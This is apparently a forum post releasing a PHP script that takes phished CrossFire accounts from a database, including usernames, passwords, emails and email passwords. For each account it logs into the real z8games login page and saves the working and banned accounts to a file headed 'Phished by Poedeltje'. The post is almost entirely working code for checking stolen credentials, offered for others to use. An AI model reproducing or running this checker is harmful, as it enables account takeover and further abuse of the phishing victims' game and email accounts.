Hey,
I'm releasing this PHP script, yolo.
Code:
<?php
ini_set("max_execution_time", "1000");
set_time_limit(1000);
$mysqli = new mysqli("localhost", "root", "password", "database");
$query = "SELECT * FROM `cf_accounts` ORDER BY `id` DESC";
$result = $mysqli->query($query);
$datetime = date("F j, Y, g:i a");
$filename = date("His").".txt";
$handle = fopen($filename, 'w') or die("can't open file");
fclose($handle);
$line1 = "+----------------------------------------+" . PHP_EOL;
$line2 = "| Phished by Poedeltje from www.MPGH.net |" . PHP_EOL;
$line3 = "| Don't re-publish without permission. |" . PHP_EOL;
$line4 = "| Generated at ".$datetime." |" . PHP_EOL;
$line5 = "+----------------------------------------+" . PHP_EOL;
$line6 = " " . PHP_EOL;
$total = $line1.$line2.$line3.$line4.$line5.$line6;
$f = fopen($filename, 'a+');
fwrite($f, $total);
fclose($f);
while($row = $result->fetch_assoc()) {
$url = 'http://clan.z8games.com/loging/globelogin.aspx';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
$html = file_get_contents($url);
preg_match('~<input type=\"hidden\" name=\"__VIEWSTATE\" id=\"__VIEWSTATE\" value=\"(.*?)\" />~',$html,$viewstate);
preg_match('~<input type=\"hidden\" name=\"__EVENTVALIDATION\" id=\"__EVENTVALIDATION\" value=\"(.*?)\" />~',$html,$eventvalidation);
$vstate = $viewstate[1];
$eval = $eventvalidation[1];
$post_fields='__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=' . urlencode($vstate) . '&__EVENTVALIDATION=' . urlencode($eval) . '&tb_loginid=' . $row['username'] . '&tb_password=' . $row['password'] . '&ib_login.x=11&ib_login.y=19';
curl_setopt($ch, CURLOPT_RETURNTRANSFER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_ENCODING, "");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7s");
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec($ch);
if (stripos($store, "Deposit") !== false) {
$data = 'Username: ' . $row['username'] . ' | Password: ' . $row['password'] . ' | E-mail: ' . $row['email'] . ' | E-mail password: ' . $row['emailpw'] . ' ' . PHP_EOL;
$f = fopen($filename, 'a+');
fwrite($f, $data);
fclose($f);
} elseif(preg_match('~Account is blocked. Reason: Hack Please contact support for more information and assistance. Thank you.~', $store)) {
$data = 'Username: ' . $row['username'] . ' | Password: ' . $row['password'] . ' | E-mail: ' . $row['email'] . ' | E-mail password: ' . $row['emailpw'] . ' (Banned)' . PHP_EOL;
$f = fopen($filename, 'a+');
fwrite($f, $data);
fclose($f);
} else {
//niks
}
curl_close($ch);
file_put_contents("cookie.txt", "");
}
$linecount = 0;
$handle = fopen($filename, "r");
while(!feof($handle)){
$line = fgets($handle);
$linecount++;
}
fclose($handle);
$linecount1 = $linecount-7;
echo 'Done, file location: <br>"'. $filename .'"<br /><br /><i>(There are '.$linecount1.' accounts.)</i>';
?>
Poedeltje.